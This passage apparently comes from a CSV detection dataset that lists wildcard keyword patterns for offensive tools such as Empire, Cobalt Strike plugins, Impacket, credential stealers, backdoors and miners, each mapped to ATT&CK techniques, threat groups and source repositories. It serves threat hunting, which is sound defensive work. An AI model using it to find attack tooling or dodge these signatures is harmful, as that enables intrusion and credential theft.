a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/xan7r/kerberoast*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*/xar-1.5.2.tar.gz*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/xdmcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/xen-mimi.ps1*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*/xml_attack.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/xml_attacks.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/xmlrpc-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/xmpp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/xmpp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/xmrig-*-gcc-win64.zip*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*/xmrig.exe*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*/xmrig.git*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*/xndpxs/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/xndpxs/CVE-2022-0847,1,1,N/A,N/A,1,8,7,2022-03-07T17:59:12Z,2022-03-07T17:51:02Z -*/xor/stager.txt*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,1,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z -*/xor/xor.go*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,1,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z -*/XOR_b64_encrypted/*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*/XorObfuscation.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/xpath_injection.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/xPipe/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,1,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*/xss_robertux.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/xxe_fuzz.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/yanghaoi/_CNA*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/ysoserial/*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/zerologon.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF zerologon exploit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ZeroLogon-BOF,1,1,N/A,10,10,148,40,2022-04-25T11:22:45Z,2020-09-17T02:07:13Z -*/zerologon.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/zhzyker/CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/zhzyker/CVE-2020-5902/,1,0,N/A,N/A,1,13,8,2020-07-08T04:10:12Z,2020-07-08T04:02:07Z -*/zsh_executor/*.go*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/zwjjustdoit/cve-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0002 - TA0006 - TA0009,N/A,N/A,Exploitation tools,https://github.com/zwjjustdoit/cve-2022-23131,1,1,N/A,N/A,1,0,3,2022-02-21T04:55:57Z,2022-02-21T02:42:23Z -*:(){:I: &I*,greyware_tool_keyword,linux,fork bomb linux - denial-of-service attack wherein a process continually replicates itself to deplete available system resources slowing down or crashing the system due to resource starvation,T1499,TA0040,N/A,N/A,Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*:\ProgramData\RecoverySystem\recoveryWindows.zip*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*:\ProgramData\SystemData\igfxCUIService.exe*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*:\ProgramData\SystemData\tempo1.txt*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*:\ProgramData\SystemData\tempo2.txt*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*:\Users\Public\Music\*.dll*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,0,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*:'123pentest'*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*:8999/Payloads/*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*:9090*/api/v1.0/relays*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*?convert_ccache_to_kirbi*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*?convert_kirbi_to_ccache*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*?PSAmsi*PSReflect.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*?sample_sliver.json*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*[!] Failed to enumerate Credman:*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[#] Ready For ETW Patch.*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*[*] Downloading the legitimate GPO from SYSVOL*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[*] Injecting malicious scheduled task into downloaded GPO*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[*] Smuggling in HTML*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,0,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*[*] Smuggling in SVG*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,0,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z 